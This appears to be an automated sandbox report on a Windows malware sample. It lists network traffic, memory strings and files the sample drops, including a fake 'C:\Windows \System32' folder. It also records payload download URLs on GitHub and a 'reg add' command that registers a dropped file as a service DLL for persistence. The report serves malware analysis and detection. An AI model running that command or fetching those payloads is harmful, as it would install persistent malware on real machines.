Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: GitHub.com Date: Fri, 20 Dec 2024 15:21:11 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close Content-Length: 14 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block Content-Type: text/plain; charset=utf-8 X-GitHub-Request-Id: E7DD:1E2FCC:102100F:11FBC66:67658B77 Accept-Ranges: bytes Date: Fri, 20 Dec 2024 15:21:28 GMT Via: 1.1 varnish X-Served-By: cache-ewr-kewr1740054-EWR X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1734708088.395102,VS0,VE8 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: f4ac69695fb846c7d8c2b5d2b72fff0393e58471 Expires: Fri, 20 Dec 2024 15:26:28 GMT Source-Age: 0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.22.0 (Ubuntu) Date: Fri, 20 Dec 2024 15:20:31 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.22.0 (Ubuntu) Date: Fri, 20 Dec 2024 15:20:38 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.22.0 (Ubuntu) Date: Fri, 20 Dec 2024 15:20:52 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive
Source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmp String found in binary or memory: http://mingw-w64.sourceforge.net/X
Source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2846258321.00000000682A4000.00000008.00000001.01000000.0000000D.sdmp String found in binary or memory: http://www.gnu.org/licenses/
Source: svchost.exe String found in binary or memory: http://www.zlib.net/
Source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2848995492.00007FFBBBDA7000.00000002.00000001.01000000.00000010.sdmp, console_zero.exe, 00000020.00000002.1808573202.00007FFBBBDA7000.00000002.00000001.01000000.00000010.sdmp, console_zero.exe, 0000002A.00000002.1827153646.00007FFBBBDA7000.00000002.00000001.01000000.00000010.sdmp String found in binary or memory: http://www.zlib.net/D
Source: svchost.exe, console_zero.exe String found in binary or memory: https://curl.se/
Source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2848835181.00007FFBBAFDB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, 00000020.00000002.1808475835.00007FFBBAFDB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, 0000002A.00000002.1826970264.00007FFBBAFDB000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: https://curl.se/V
Source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, svchost.exe, 0000001A.00000002.2848750352.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, console_zero.exe, 00000020.00000002.1808383974.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, 0000002A.00000002.1826773265.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: console_zero.exe String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: svchost.exe, console_zero.exe String found in binary or memory: https://curl.se/docs/copyright.html
Source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2848835181.00007FFBBAFDB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, 00000020.00000002.1808475835.00007FFBBAFDB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, 0000002A.00000002.1826970264.00007FFBBAFDB000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: https://curl.se/docs/copyright.htmlD
Source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, svchost.exe, 0000001A.00000002.2848750352.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, console_zero.exe, 00000020.00000002.1808383974.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, 0000002A.00000002.1826773265.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: https://curl.se/docs/hsts.html
Source: console_zero.exe String found in binary or memory: https://curl.se/docs/hsts.html#
Source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, svchost.exe, 0000001A.00000002.2848750352.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, console_zero.exe, 00000020.00000002.1808383974.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmp, console_zero.exe, 0000002A.00000002.1826773265.00007FFBBAFBB000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: console_zero.exe String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, svchost.exe, 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmp, console_zero.exe, console_zero.exe, 00000020.00000002.1808210205.00007FF70F2D3000.00000002.00000001.01000000.00000011.sdmp, console_zero.exe, 00000020.00000000.1749217813.00007FF70F2D3000.00000002.00000001.01000000.00000011.sdmp, console_zero.exe, 0000002A.00000002.1826480187.00007FF70F2D3000.00000002.00000001.01000000.00000011.sdmp, console_zero.exe, 0000002A.00000000.1764823946.00007FF70F2D3000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: https://dns.google/resolve?name=
Source: svchost.exe, 0000001A.00000002.2847028150.0000013B84463000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/runvd01/dwl/raw/refs/heads/main/cmn/uamd.dat
Source: svchost.exe, 0000001A.00000002.2847004878.0000013B8442B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/runvd01/dwl/raw/refs/heads/main/cmn/ucpu.dat
Source: svchost.exe, 0000001A.00000003.2211131614.0000013B844E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2847004878.0000013B8442B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/runvd01/dwl/raw/refs/heads/main/cmn/ucpusys.dat
Source: svchost.exe, 0000001A.00000002.2847004878.0000013B8442B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2847222227.0000013B8448C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000003.2211131614.0000013B844EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/runvd01/dwl/raw/refs/heads/main/cmn/unv.dat
Source: svchost.exe, 0000001A.00000002.2847427687.0000013B84902000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2847222227.0000013B8448C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/runvd01/dwl/raw/refs/heads/main/un1/uusb.dat
Source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2848118434.00007FFBAB074000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: https://ipinfo.io/json
Source: svchost.exe, 0000001A.00000003.2211131614.0000013B844E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000003.2211131614.0000013B844EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/missingauth
Source: svchost.exe, 0000001A.00000002.2847310661.0000013B844F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/rootunvbot/mydata/refs/heads/main/unvumainrestorehardx.dat
Source: svchost.exe, 0000001A.00000002.2847427687.0000013B84902000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/runvd01/dwl/refs/heads/main/u
Source: svchost.exe, 0000001A.00000002.2847427687.0000013B84902000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2847330585.0000013B844FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2847222227.0000013B8448C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/runvd01/dwl/refs/heads/main/un1/uusb.dat
Source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2845803486.00000000660F4000.00000008.00000001.01000000.0000000F.sdmp String found in binary or memory: https://www.gnu.org/licenses/
Source: svchost.exe String found in binary or memory: https://www.openssl.org/
Source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp, svchost.exe, 0000001A.00000002.2847985695.00007FFBAA11E000.00000002.00000001.01000000.0000000B.sdmp, svchost.exe, 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: https://www.openssl.org/H
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 8.8.4.4:443 -> 192.168.2.8:49723 version: TLS 1.2
Source: unknown HTTPS traffic detected: 8.8.4.4:443 -> 192.168.2.8:49727 version: TLS 1.2
Source: unknown HTTPS traffic detected: 8.8.4.4:443 -> 192.168.2.8:49761 version: TLS 1.2
Source: unknown HTTPS traffic detected: 8.8.4.4:443 -> 192.168.2.8:49779 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.8:49785 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.8:49804 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.8:49814 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.8:49829 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.8:49835 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.8:49853 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.8:49861 version: TLS 1.2
Source: C:\Windows\System32\console_zero.exe Code function: 32_2_00007FFBBAF62B80 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,32_2_00007FFBBAF62B80
Source: C:\Windows\System32\svchost.exe Code function: 26_2_00007FFBAB039E50: DeviceIoControl,GetLastError,26_2_00007FFBAB039E50
Source: C:\Windows\System32\svchost.exe Code function: 26_2_00007FFBAB0118D0 WTSGetActiveConsoleSessionId,WTSQueryUserToken,CreateProcessAsUserW,CloseHandle,WaitForSingleObject,CloseHandle,CloseHandle,CloseHandle,CloseHandle,_invalid_parameter_noinfo_noreturn,GetSystemDirectoryW,26_2_00007FFBAB0118D0
Source: C:\Users\user\Desktop\58VSNPxrI4.exe File created: C:\Windows \System32\printui.exe
Source: C:\Users\user\Desktop\58VSNPxrI4.exe File created: C:\Windows \System32\printui.dll
Source: C:\Windows\System32\cmd.exe File created: C:\Windows
Source: C:\Windows\System32\cmd.exe File created: C:\Windows \System32
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\winsvcf
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\winsvcf\winlogsvc
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libcurl.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\zlib1.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libcrypto-3-x64.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libiconv-2.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libintl-9.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libssl-3-x64.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libwinpthread-1.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\console_zero.exe
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libpq.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\ucrtbased.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\vcruntime140d.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\x939048.dat
Source: C:\Windows\System32\svchost.exe File created: c:\windows\system32\winsvcf\x549596.dat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File deleted: C:\Windows\Temp\__PSScriptPolicyTest_zu2y31t2.mzr.ps1
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2AC66832_2_00007FF70F2AC668
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2876D032_2_00007FF70F2876D0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2826AC32_2_00007FF70F2826AC
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F28A6F032_2_00007FF70F28A6F0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F287D6032_2_00007FF70F287D60
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2B95B832_2_00007FF70F2B95B8
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2CB45432_2_00007FF70F2CB454
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2CCC8432_2_00007FF70F2CCC84
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2C246832_2_00007FF70F2C2468
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F27439032_2_00007FF70F274390
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F28238032_2_00007FF70F282380
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F28738032_2_00007FF70F287380
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2883E032_2_00007FF70F2883E0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F287A2032_2_00007FF70F287A20
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2B8A7C32_2_00007FF70F2B8A7C
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F29A2D032_2_00007FF70F29A2D0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2C2AE032_2_00007FF70F2C2AE0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F285AE032_2_00007FF70F285AE0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F27218032_2_00007FF70F272180
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2C621032_2_00007FF70F2C6210
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F272A1032_2_00007FF70F272A10
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2CD1DC32_2_00007FF70F2CD1DC
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF61C3032_2_00007FFBBAF61C30
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAFA6B5032_2_00007FFBBAFA6B50
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAFA2B6032_2_00007FFBBAFA2B60
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF62B8032_2_00007FFBBAF62B80
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF749E032_2_00007FFBBAF749E0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF7BA4032_2_00007FFBBAF7BA40
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF8AA5232_2_00007FFBBAF8AA52
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF6EFC032_2_00007FFBBAF6EFC0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF63FE032_2_00007FFBBAF63FE0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAFACEC032_2_00007FFBBAFACEC0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF9CDD032_2_00007FFBBAF9CDD0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF9FE3032_2_00007FFBBAF9FE30
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF8BE3032_2_00007FFBBAF8BE30
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF63D5032_2_00007FFBBAF63D50
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAFA3D8032_2_00007FFBBAFA3D80
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF9A3A032_2_00007FFBBAF9A3A0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF5F0C032_2_00007FFBBAF5F0C0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAFA00D032_2_00007FFBBAFA00D0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF8C7B032_2_00007FFBBAF8C7B0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF816F032_2_00007FFBBAF816F0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAFA867032_2_00007FFBBAFA8670
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF8A4A432_2_00007FFBBAF8A4A4
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAFB04A632_2_00007FFBBAFB04A6
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF8B4E032_2_00007FFBBAF8B4E0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAFA74F032_2_00007FFBBAFA74F0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAF8F50032_2_00007FFBBAF8F500
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFBAB4483C0 appears 46 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFBAB448330 appears 44 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFBAB49EDF0 appears 422 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFBAAFC3E40 appears 90 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFBAB49E10A appears 32 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFBAB49E104 appears 229 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFBAB49E896 appears 138 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFBAB458FD0 appears 52 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFBAB49E0FE appears 34 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFBAB49E1CA appears 640 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FFBAB49E8A2 appears 106 times
Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FF70F273700 appears 88 times
Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFBBAF84EB0 appears 39 times
Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFBBAF9E2A0 appears 83 times
Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFBBAF64D20 appears 44 times
Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFBBAF84D90 appears 42 times
Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFBBAF64B60 appears 330 times
Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFBBAF9E230 appears 37 times
Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFBBAFA3D10 appears 31 times
Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFBBAF946D0 appears 45 times
Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFBBAF64BB0 appears 52 times
Source: C:\Windows\System32\console_zero.exeCode function: String function: 00007FFBBAF64A70 appears 478 times
Source: libwinpthread-1.dll.13.dr | Static PE information: Number of sections : 12 > 10
Source: libintl-9.dll.13.dr | Static PE information: Number of sections : 20 > 10
Source: libiconv-2.dll.13.dr | Static PE information: Number of sections : 20 > 10
Source: x549596.dat.26.dr | Static PE information: Number of sections : 11 > 10
Source: x549596.dat.26.dr | Static PE information: No import functions for PE file found
Source: x549596.dat.26.dr | Static PE information: Data appended to the last section found
Source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileNamelibpq.dll6 vs 58VSNPxrI4.exe
Source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameWinPthreadGCp( vs 58VSNPxrI4.exe
Source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamezlib1.dll* vs 58VSNPxrI4.exe
Source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameucrtbase.dllj% vs 58VSNPxrI4.exe
Source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF7844E2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamelibsslH vs 58VSNPxrI4.exe
Source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameiconv.dllv+ vs 58VSNPxrI4.exe
Source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamevcruntime140d.dll^ vs 58VSNPxrI4.exe
Source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameintl.dllp( vs 58VSNPxrI4.exe
Source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamelibcryptoH vs 58VSNPxrI4.exe
Source: 58VSNPxrI4.exe, 00000000.00000000.1601838257.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamelibcurl.dllB vs 58VSNPxrI4.exe
Source: 58VSNPxrI4.exe, 00000000.00000003.1683788301.000002B6E7A91000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameprintui.exej% vs 58VSNPxrI4.exe
Source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameiconv.dllv+ vs 58VSNPxrI4.exe
Source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamevcruntime140d.dll^ vs 58VSNPxrI4.exe
Source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameintl.dllp( vs 58VSNPxrI4.exe
Source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamelibcryptoH vs 58VSNPxrI4.exe
Source: 58VSNPxrI4.exe, 00000000.00000002.1701148213.00007FF783AE2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamelibcurl.dllB vs 58VSNPxrI4.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x939048\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x939048.dat" /f
Source: classification engine | Classification label: mal100.evad.winEXE@86/46@9/7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3508:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3324:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3040:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2544:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5384:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3532:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4128:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2040:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5176:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5888:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2464:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5540:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7028:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1272:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6476:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3276:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2940:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mkrnqcof.t5m.ps1
Source: 58VSNPxrI4.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\58VSNPxrI4.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 58VSNPxrI4.exe | Virustotal: Detection: 45%
Source: 58VSNPxrI4.exe | ReversingLabs: Detection: 39%
Source: svchost.exe | String found in binary or memory: -start
Source: svchost.exe | String found in binary or memory: -addr
Source: svchost.exe | String found in binary or memory: ../../gettext-runtime/intl/loadmsgcat.c
